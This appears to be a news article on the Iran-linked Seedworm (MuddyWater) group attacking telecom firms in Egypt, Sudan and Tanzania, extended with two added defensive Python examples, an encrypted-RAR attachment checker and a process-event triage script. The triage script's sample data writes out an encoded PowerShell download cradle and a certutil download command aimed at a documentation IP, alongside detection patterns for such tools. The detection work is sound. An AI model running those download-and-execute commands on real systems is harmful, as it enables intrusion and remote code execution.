An Iran-backed cyberespionage group is actively targeting telcos in North and East Africa.
According to security researchers at Symantec, the latest cyberattacks by the advanced persistent threat (APT) it calls Seedworm (also known as MuddyWater) are targeting telecommunications-sector organizations in Egypt, Sudan, and Tanzania. One telco-sector organization in particular, previously compromised by Seedworm earlier in 2023 but so far unnamed, is bearing the brunt of the latest attacks.
Seedworm’s Power(Shell) Play
The first evidence of malicious activity came from the execution of PowerShell code to connect to a command-and-control (C2) framework called MuddyC2Go, infrastructure that researchers have previously linked to Seedworm.
“The attackers also use the SimpleHelp remote access tool and Venom Proxy, which have previously been associated with Seedworm activity, as well as using a custom keylogging tool, and other publicly available and living-off-the-land tools,” Symantec researchers reported in a Dec. 19 analysis of the cyberattacks.
Living-off-the-land refers to the practice of using off-the-shelf technology and native operating system applications to hide malicious activity. By misusing legitimate applications, attackers avoid creating unusual traffic or activity on the compromised network, thereby reducing their risk of detection.
Dark Reading has approached Symantec for comment on details of the latest run of attacks by Seedworm, as well as suggestions for possible countermeasures.
Seeds of Doubt
Seedworm has been active since 2017 and has previously been linked to Iran’s Ministry of Intelligence and Security (MOIS). The group typically relies on spear-phishing emails containing archives, or links to archives, that include various legitimate remote administration tools, including the SimpleHelp and AnyDesk remote access utilities.
If the intended target opens the file inside the archive, it installs a remote administration tool that allows the attacker to execute additional tools and malware. More recently, the group has begun planting malware payloads inside password-protected RAR archives in a bid to evade detection by email security products at targeted organizations, according to a recent blog post by security research firm Deep Instinct.
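The evasion just described can be caught at the mail gateway even though the gateway cannot scan the archive's contents: an encrypted archive is itself the signal to quarantine or sandbox. The following Python example is added here (it is not code from Deep Instinct, Symantec, or this article) and inspects a RAR attachment's headers to report whether the archive uses encrypted headers or password-protected entries, for both the RAR4 and RAR5 container formats. The header layouts follow the published RAR formats; the sample archives are hand-built minimal headers constructed for this example, not real malware, and the `_rar4_block`/`_rar5_block` builders exist only to assemble them.

```python
import struct
import zlib

RAR4_SIG = b"Rar!\x1a\x07\x00"
RAR5_SIG = b"Rar!\x1a\x07\x01\x00"


def _vint(buf: bytes, pos: int):
    """Decode a RAR5 variable-length integer: 7 bits per byte, low bits first."""
    value, shift = 0, 0
    while True:
        b = buf[pos]
        pos += 1
        value |= (b & 0x7F) << shift
        if not b & 0x80:
            return value, pos
        shift += 7


def _encode_vint(n: int) -> bytes:
    out = bytearray()
    while n > 0x7F:
        out.append((n & 0x7F) | 0x80)
        n >>= 7
    out.append(n)
    return bytes(out)


def _rar4_status(data: bytes) -> str:
    pos, files_encrypted = len(RAR4_SIG), False
    while pos + 7 <= len(data):
        htype, flags, hsize = struct.unpack_from("<xxBHH", data, pos)  # skip HEAD_CRC
        if htype == 0x73 and flags & 0x0080:    # MHD_PASSWORD: the headers themselves are encrypted
            return "headers"
        if htype == 0x74 and flags & 0x0004:    # LHD_PASSWORD: this entry's data is encrypted
            files_encrypted = True
        add = struct.unpack_from("<I", data, pos + 7)[0] if flags & 0x8000 else 0
        if hsize < 7:
            break                               # corrupt header: stop rather than loop forever
        pos += hsize + add                      # header plus its trailing data area
    return "files" if files_encrypted else "none"


def _rar5_status(data: bytes) -> str:
    pos, files_encrypted = len(RAR5_SIG), False
    while pos + 5 <= len(data):
        hsize, hstart = _vint(data, pos + 4)    # a 4-byte CRC32 precedes the size vint
        if hsize == 0:
            break
        header = data[hstart:hstart + hsize]
        htype, p = _vint(header, 0)
        hflags, p = _vint(header, p)
        extra_size = data_size = 0
        if hflags & 0x0001:
            extra_size, p = _vint(header, p)
        if hflags & 0x0002:
            data_size, p = _vint(header, p)
        if htype == 4:                          # archive encryption header: all later headers are encrypted
            return "headers"
        if htype == 2 and extra_size:           # file header: extra area sits at the end of the header
            extra, q = header[len(header) - extra_size:], 0
            while q < len(extra):               # walk extra records; type 1 is "file encryption"
                rsize, q = _vint(extra, q)
                rtype, _ = _vint(extra, q)
                if rtype == 1:
                    files_encrypted = True
                q += rsize
        if htype == 5:                          # end-of-archive header
            break
        pos = hstart + hsize + data_size
    return "files" if files_encrypted else "none"


def rar_encryption_status(data: bytes) -> str:
    """'headers' (encrypted headers), 'files' (password-protected entries), 'none',
    'not-rar', or 'malformed' when the header chain cannot be walked."""
    try:
        if data.startswith(RAR5_SIG):
            return _rar5_status(data)
        if data.startswith(RAR4_SIG):
            return _rar4_status(data)
    except (IndexError, struct.error):
        return "malformed"
    return "not-rar"


def _rar5_block(body: bytes) -> bytes:
    """Assemble one RAR5 block: CRC32 | header-size vint | header body."""
    size = _encode_vint(len(body))
    return struct.pack("<I", zlib.crc32(size + body)) + size + body


def _rar4_block(htype: int, flags: int, body: bytes) -> bytes:
    """Assemble one RAR4 block: HEAD_CRC (left zero) | type | flags | size | body."""
    return b"\x00\x00" + struct.pack("<BHH", htype, flags, 7 + len(body)) + body


# Constructed samples for this example: minimal hand-built headers, no real payload.
_ENC_RECORD = _encode_vint(36) + b"\x01" + b"\x00\x00\x0f" + bytes(32)   # extra record type 1: file encryption
_FILE_HEADER = (b"\x02\x03" + _encode_vint(len(_ENC_RECORD)) + _encode_vint(4)   # type 2, flags: extra+data
                + b"\x00" + _encode_vint(4) + b"\x00\x00\x00" + _encode_vint(5) + b"x.exe" + _ENC_RECORD)
SAMPLES = {
    "rar5_encrypted_headers": RAR5_SIG + _rar5_block(b"\x04\x00" + b"\x00\x00\x0f" + bytes(16)),
    "rar5_encrypted_file": RAR5_SIG + _rar5_block(b"\x01\x00\x00") + _rar5_block(_FILE_HEADER)
                           + bytes(4) + _rar5_block(b"\x05\x00\x00"),
    "rar5_plain": RAR5_SIG + _rar5_block(b"\x01\x00\x00") + _rar5_block(b"\x05\x00\x00"),
    "rar4_encrypted_headers": RAR4_SIG + _rar4_block(0x73, 0x0080, bytes(6)),
    "rar4_encrypted_file": RAR4_SIG + _rar4_block(0x73, 0, bytes(6)) + _rar4_block(
        0x74, 0x8004, struct.pack("<IIBIIBBHI", 4, 4, 2, 0, 0, 29, 0x30, 5, 0x20) + b"x.exe") + bytes(4),
    "zip": b"PK\x03\x04" + bytes(26),
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print(f"{name}: {rar_encryption_status(blob)}")
```

A gateway policy built on this would treat "headers" and "files" identically: both mean the content scanner will see only ciphertext, so the attachment should be held for sandboxing or user confirmation rather than allowed through because "nothing was detected".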
The latest malicious files being slung by the group contain an embedded PowerShell script that automatically connects to MuddyC2Go. This approach removes the need for manual execution of scripts by the attackers.
Symantec’s researchers found that Seedworm typically targets government and private organizations across various sectors, including telecommunications, local government, defense, and oil and natural gas. The group’s targets are mostly Iran’s neighbors in the Middle East region, including Turkey, Israel, Iraq, the United Arab Emirates, and Pakistan.
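The chain described in the last few paragraphs (archive opened by the user, a legitimate remote-administration tool dropped, PowerShell reaching out to the C2, living-off-the-land binaries for the rest) leaves a recognisable pattern in process-creation telemetry even though every binary involved is legitimate. The following Python triage helper is an added example (not Symantec's detection logic or anything from the article) that scores Sysmon event 1 / Security 4688-style events for exactly those traits: encoded or hidden PowerShell carrying a download cradle, remote-admin tools launched from a temp or download directory or directly from an archive viewer, and LOLBins fetching a URL. The sample events, the file name `SimpleHelp-RemoteAccess.exe`, and the 203.0.113.10 address are constructed for illustration; the tool and LOLBin lists are starting points, not a complete signature set.

```python
import base64
import re

# Substrings of the remote-access / tunnelling tool names the page ties to Seedworm.
# Assumption: the on-disk executable name carries the product name; in production,
# match on signer or file hash instead, since vendors rename binaries between versions.
REMOTE_ADMIN_TOOLS = ("simplehelp", "anydesk", "venom")
# Starter list of living-off-the-land binaries abused for download-and-execute
# (an assumption for this example; extend it from your own environment's baseline).
LOLBINS = {"certutil.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe", "bitsadmin.exe"}
# Parents that mean "a user just opened something from an archive or a mail attachment".
ARCHIVE_PARENTS = {"winrar.exe", "7zfm.exe", "7zg.exe", "winword.exe", "excel.exe", "outlook.exe"}
USER_WRITABLE = re.compile(r"\\(?:temp|tmp|downloads|appdata\\local\\temp)\\", re.I)
NETWORK_CRADLE = re.compile(
    r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b|\birm\b|"
    r"invoke-restmethod|tcpclient|invoke-expression|\biex\b|start-bitstransfer", re.I)
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_ARG = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDE_FLAGS = re.compile(
    r"-(?:w(?:indowstyle)?\s+hidden|nop\b|noprofile|ep\s+bypass|executionpolicy\s+bypass)", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or '' if none."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def triage(event: dict) -> list:
    """Score one process-creation event; returns the findings, [] when nothing matched."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    findings = []

    if image in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(cmd)
        if decoded:
            findings.append("powershell: encoded command")
        if HIDE_FLAGS.search(cmd):
            findings.append("powershell: hidden/bypass flags")
        if NETWORK_CRADLE.search(cmd + " " + decoded):   # inspect the decoded payload too
            findings.append("powershell: network cradle / in-memory execution")
        if parent in ARCHIVE_PARENTS:
            findings.append(f"powershell: spawned by {parent}")

    if any(tool in image for tool in REMOTE_ADMIN_TOOLS) and (
            USER_WRITABLE.search(event.get("Image", "")) or parent in ARCHIVE_PARENTS):
        findings.append(f"remote-admin tool {image} launched from user-writable path or archive")

    if image in LOLBINS and re.search(r"https?://", cmd, re.I):
        findings.append(f"lolbin {image} fetching a remote resource")

    return findings


def triage_all(events: list) -> list:
    """Return (index, findings) for every event that produced at least one finding."""
    return [(i, f) for i, ev in enumerate(events) if (f := triage(ev))]


# Constructed sample telemetry (not real logs; 203.0.113.10 is a documentation address
# and the SimpleHelp file name is made up for the example).
SAMPLE_EVENTS = [
    {   # benign: scheduled maintenance script
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "CommandLine": r"powershell.exe -File C:\Scripts\rotate-logs.ps1",
    },
    {   # hidden, encoded download cradle launched from an archive viewer
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Program Files\WinRAR\WinRAR.exe",
        "CommandLine": "powershell.exe -nop -w hidden -enc " + base64.b64encode(
            "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/c2')"
            .encode("utf-16le")).decode(),
    },
    {   # remote-admin tool executed straight out of the extraction directory
        "Image": r"C:\Users\alice\AppData\Local\Temp\Rar$EXa0.123\SimpleHelp-RemoteAccess.exe",
        "ParentImage": r"C:\Program Files\WinRAR\WinRAR.exe",
        "CommandLine": "SimpleHelp-RemoteAccess.exe",
    },
    {   # living-off-the-land download
        "Image": r"C:\Windows\System32\certutil.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "certutil.exe -urlcache -split -f http://203.0.113.10/a.dll a.dll",
    },
]

if __name__ == "__main__":
    for index, findings in triage_all(SAMPLE_EVENTS):
        print(index, findings)
```

The point of decoding `-EncodedCommand` before matching is that the cradle keywords never appear in the raw command line of the encoded variant; a rule that only inspects the visible arguments sees nothing but base64. Conversely, the remote-admin check deliberately does not fire on a SimpleHelp or AnyDesk install under Program Files, since the same tools are legitimately used by IT, which is exactly why the attackers chose them.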
Iran’s Cyber Tradecraft
Iranian cyberespionage groups are known for setting up false personae on LinkedIn and elsewhere in an effort to persuade targets to open malicious links or attachments, rather than relying on unpatched vulnerabilities to hack into targeted organizations.
Iran began heavily investing in its cyber-operations program following the discovery of the infamous Stuxnet cyber-sabotage weapon in 2010. The Stuxnet malware infected the supervisory control and data acquisition (SCADA) systems at Iran’s nuclear facilities, notably its uranium enrichment centrifuges, and sabotaged their operation. Security researchers attributed the malware to a joint US and Israeli intelligence operation.
Iran’s Islamic Revolutionary Guard Corps (IRGC) has since been linked to disruptive and destructive attacks such as the Shamoon wiper malware attacks against oil and gas companies in Saudi Arabia and Qatar. By contrast, MOIS is a civilian intelligence service largely focused on the clandestine acquisition of intelligence. Seedworm has been named as a subordinate element or unit within Iran’s MOIS.